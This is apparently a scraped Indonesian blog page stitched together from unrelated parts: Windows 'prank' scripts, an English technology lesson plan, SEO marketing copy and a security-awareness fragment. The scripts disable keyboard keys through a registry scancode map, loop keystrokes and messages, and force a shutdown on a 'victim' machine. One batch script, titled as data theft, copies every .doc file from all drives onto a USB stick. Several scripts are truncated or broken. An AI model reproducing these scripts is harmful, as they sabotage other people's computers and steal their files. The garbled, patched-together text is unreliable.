Cara Mematikan Tombol Keyboard

Sekarang Saya akan Memberikan Trik Atau Tips Kepada Teman Teman Sekalian.Utuk Menjailkan Komputer.Supaya Tombol Keyboard Mati Program dIni di Klik. Copy Paste aja Coding di bawah Ini

Signature=”$Windows NT$”


HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
17,00,00,00,18,00,00,00,16,00,00,00,00,002.    Untuk menjalankannya, klik kanan nama file Hack INF dan pilih menu> Install

Membuat Komputer Hang dengan Kode Script Notepad

Sekarang Saya akan Memberikan Trik Atau Tips Kepada Teman Teman Sekalian.Utuk Menjailkan Komputer.Supaya Pesan 'Komputer Anda Komputer Hang Ketika Program dIni di Klik. Copy Paste aja Coding di bawah Ini





Cara Membuat Memilih Jawaban Seperti Quiz di Notepad

Sekarang Saya akan Memberikan Trik Atau Tips Kepada Teman Teman Sekalian.Utuk Menjailkan Komputer.Supaya Pesan 'Komputer Anda Memilih Jawaban Seperti Quiz di Notepad  Ketika Program dIni di Klik. Copy Paste aja Coding di bawah Ini

@echo off
title quiz hari ini :)
echo jika kamu kena virus tidakan  apa
yang akan  kamu lakukan

Cara Membuat Notepad Terbuka Otomatis Terus-Menerus

Sekarang Saya akan Memberikan Trik Atau Tips Kepada Teman Teman Sekalian.Utuk Menjailkan Komputer.Supaya Notepad Terbuka Otomatis Terus-Menerus  Ketika Program dIni di Klik. Copy Paste aja Coding di bawah Ini

@ECHO off
START %SystemRoot%\system32\notepad.exe
GOTO top

Membuat Notepad dengan Pesan Jail

Sekarang Saya akan Memberikan Trik Atau Tips Kepada Teman Teman Sekalian.Utuk Menjailkan Komputer.Supaya Pesan 'Komputer Anda Notepad dengan Pesan Jail  Ketika Program dIni di Klik. Copy Paste aja Coding di bawah Ini

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50

Cara Membuat Pesan 'Komputer Anda Cupu t ' di Notepad/ Wordpad

Sekarang Saya akan Memberikan Trik Atau Tips Kepada Teman Teman Sekalian.Utuk Menjailkan Komputer.Supaya Pesan 'Komputer Anda Cupu t ' di Notepad/ Wordpad  Ketika Program dIni di Klik. Copy Paste aja Coding di bawah Ini

Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "Komputer Anda Jelek Banget"

Mencari semua file yang diubah pada hari N terakhir yang mengandung teks tertentu di namanya(windows Linux)

Command line (baris perintah) di Linux akan mempercepat sekaligus mempermudah kita dalam berhubungan dengan sistem. Bagi mereka yang sudah terbiasa dengan command line justru akan 'merasa malas' ketika harus menggunakan antarmuka GUI walaupun padanan command line dalam bentuk GUI-nya sudah tersedia. Dan ini pulalah yang menjadi nilai lebih untuk sistem operasi berbasis Linux/Unix, walaupun bagi para pengguna yang baru mengenal akan merasa sedikit kesulitan.Di bawah ini ada 10 command line (baris perintah) di Linux yang dapat bermanfaat mempercepat aktivitas kita:

Mencuri Data Dengan USB FlashDrive

1.     Buka notepad pertama . .. kalau males ngetik bisa copas tulisan di bawah ini ..
@echo off
REM Name : silentxxx
REM Author : Silentxxx
Set silent=%computername% _ %random%
If not exist ”%silent%” Md “%silent%”
For%%a in (C D E F G H I J) do if exist %%a:\ (
For /f “tokens=*” %%b in (‘dir /a/b/s %%a:\*.doc’) do (
attrib –s –h –r “%%b”
copy “%%b” “%silent%” /y)

Membuat Tombol Backspace Menjadi Error - Menekan Terus-Menerus

Sekarang Saya akan Memberikan Trik Atau Tips Kepada Teman Teman Sekalian.Utuk Menjailkan Komputer.Supaya  Tombol Backspace Menjadi Error - Menekan Terus-Menerus  Ketika Program dIni di Klik. Copy Paste aja Coding di bawah Ini

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{bs}"

Jail dengan Membuka Tutup CD/DVD Room komputer Atau Leptop

Sekarang Saya akan Memberikan Trik Atau Tips Kepada Teman Teman Sekalian.Utuk Menjailkan Komputer.Supaya Membuka Tutup CD/DVD Room komputer Atau Leptop Ketika Program dIni di Klik. Copy Paste aja Coding di bawah Ini

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
For i = 0 to colCDROMs.Count - 1
End If
wscript.sleep 5000

Membuat Pesan Jail Muncul Terus DiKomputer Korban

Sekarang Saya akan Memberikan Trik Atau Tips Kepada Teman Teman Sekalian.Utuk Menjailkan Komputer.Supaya Membuat Pesan Jail Muncul Terus DiKomputer Korban Ketika Program dIni di Klik. Copy Paste aja Coding di bawah Ini

@ECHO off
msg * Please jangan Lebay
msg * hayo  gw acak acak Komputer Lu
msg * Ayo install ulang aja
msg * biar masalah nya Selesai Coy


Membuat Tombol Caps Lock Menyala Terus-Menerus Tanpa Henti

Sekarang Saya akan Memberikan Trik Atau Tips Kepada Teman Teman Sekalian.Utuk Menjailkan Komputer.Supaya Caps Lock Menyala Terus-Menerus Tanpa Henti  Ketika Program dIni di Klik. Copy Paste aja Coding di bawah Ini

Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"

Membuat Script Muncul Terus-Menerus Tanpa Henti

Sekarang Saya akan Memberikan Trik Atau Tips Kepada Teman Teman Sekalian.Utuk Menjailkan Komputer.Supaya Script Muncul Terus-Menerus Tanpa Henti Tanpa Henti  Ketika Program dIni di Klik. Copy Paste aja Coding di bawah Ini

Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "~(enter)"

Membuat Forced Shoutdown

Sekarang Saya akan Memberikan Trik Atau Tips Kepada Teman Teman Sekalian.Utuk Menjailkan Komputer.Supaya Forced Shoutdown Ketika Program dIni di Klik. Copy Paste aja Coding di bawah Ini

@echo off
msg * Saya Tidak Menyukaimu Bey Bey
shutdown -c "Error! You are too ******!" -s

LESSON PLANE Technology at Work,

LESSON PLAN Technology at Work


1. Ask your students what they think of when they hear the word technology. Ask them when they think technology began. Their answers are likely to center on modern technology, especially computer-related technology.

2. Let students know that technology is defined as “any invention, including tools, machines, materials, and sources of power, that makes people's work easier.” Then ask them to reconsider their ideas about when technology began. They should realize that technology began the first time a human, or even a pre-human, used a stick or a rock as a tool or a weapon. Such advances as the ability to make fire, the development of agriculture, and the use of simple machines such as the lever or the inclined plane count as technology, as do electricity, nuclear power, and the computer.

Menjumlahkan Kolom DataGrid di Visual Basic

Mari kita Belajar Cara menjumlahkan data di vb menggunakan data Grid.. Bikin Tampilan Seperti Gambar diSamping Ini.
perintah Koding Dibawah ini Silakan Copy Paste Codingngnya

Cara Mengubah Memori SM card atau Flasdish Menjadi Memory Internal Letop atau PC

Cara Mengubah SM card Menjadi Memory | Memory atau RAM adalah hal yang sangat penting mendukung kecepatan komputer atau laptop. semakin besar memory yang ada semakin cepat kinerja komputer atau laptop. Pada posting kali ini Kolombloggratis.Org akan searching artikel tentang cara mudah merubah usb SM card menjadi ram, Usb SM card pasti sobat sudah banyak yang memiliki dan kapasitasnya keluaran terbarunya cukup besar, 

Cara cepat mendapatkan pagerank dari google | SEO TUTORIAL

Cara  mendapatkan pagerank dari google seo totorial - jika blog yang anda kelola mendapatkan pagerank dari google, namun itu semua tidak  mudah, karena perlu melakukan optimasi, index, review dan sebagainya yang dapat meningkat blog kita.
Untuk artikel ini, judul yang tepat adalah cara mengecilkan reputasi rankings yang di sebut alexarank, mengapa harus di kecilkan ? Karena algoritma dalam menganalisa suatu traffik dengan rangking, jika ranking blog tersebut semakin mengecil, maka semakin baik pula reputasi blog tersebut.


Our search engine optimization strategies are designed to achieve authentic and long-term results. We use proven methodologies to leverage our expertise, ultimately helping clients around the world to achieve measurable success through targeted insight and meticulous execution.
Traditional SEO methods were deemed successful when they increased brand visibility through higher rankings in search engines such as Google and Bing. However, increased rankings may be only temporary. We believe that companies will succeed and enjoy online profitability only when they take a holistic approach to search engine optimization. By incorporating world-class web analytics, industry-specific experience and integrating quality content to satisfy user intent, we increase visitor loyalty and conversion rates while giving your company the authentic search engine presence it deserves.
In the early days of search engine optimization, websites could garner search engine visibility by stuffing keywords into meta data, submitting to a couple feed programs and then calling it a day. That one-size-fits-all approach to SEO died along with the floppy disc. Many of the spammy tactics that exploited the weaknesses of past search engines were not only lacking in positive benefit, but they would damage a website’s reputation and ranking if employed today.
As search engines have become more sophisticated, social signals, user sentiment, engagement behavior and other human factors have been integrated into search engine algorithms. As a result, websites built solely for search engines are quickly losing their rankings and are being replaced by websites that authentically satisfy human expectations and intent. Thus, modern SEO must focus on the end user, the customer – the actual person sitting at the keyboard, engaging with your website.
Search Discovery’s approach to SEO balances the requirements of search engines with the needs of the customer to create a quality, sustainable, optimization strategy. At the core of our SEO program, we address the fundamental variables that lay the foundation for long-term success:
  1. Website Accessibility – Can search engines actually see (index) your content? There are often many obstacles that can prevent a simple web crawler from finding your content in images and other substandard coding techniques including, but not limited to Javascript navigation, Frames, Flash, and AJAX.
  2. Website Description – Does your website accurately portray itself linguistically and architecturally? An optimized website description refers to the successful integration of linguistic elements (keywords and phrases) into a stable and consistent architecture. Rather than merely sprinkling keywords onto a webpage, the architecture should deliver search engine-friendly content without unnecessary duplication or “keyword cannibalization.” Through extensive keyword research, strategic keyword placements and HTML integration, we take advantage of the way search engines categorize and rank web pages, ultimately leading to a sustained presence in the digital marketplace.
  3. Website Reputation and Popularity – Is your website referenced by credible sources? Google changed the search engine landscape by introducing link authority and PageRank into their algorithm. Bing emphasizes link authority as well and typically will not index a web page if another website does not link to it first. Links help search engines evaluate the reputation and authority of a website. Beyond the quantity of links pointing to a website, the source the link and method of acquisition (given, earned or paid) greatly affects how a search engine interprets a website’s quality. Websites that create great content and help their customers typically have little difficulty acquiring links from brand evangelists. On the other hand, websites that buy or trade links can face drastic search engine penalties – just ask JCPenney.
The Search Discovery SEO team takes a custom tailored approach to online success. Because no two companies are exactly alike, our comprehensive strategies for achieving high visibility are created on a website-by-website basis. While most websites share similar goals, the tactics to achieve those goals are dependent upon many factors. The chosen code base, hosting environment, competitive landscape, website architecture and overall content presentation are additional variables that help determine our tactical emphasis and direction.
Not only highly experienced and technically adept, Search Discovery SEO professionals have the ability to provide a wide range of insights through our technical site assessments and prioritized recommendations based on the potential for positive, long-term success. We help our clients internalize SEO best practices and integrate them into their development process. If you would like to learn more about our approach or how we can help with your SEO campaign, contact us today.


Do not open any attachment received from the unknown or untrusted sender Do not plug in any external USB drive into the company ...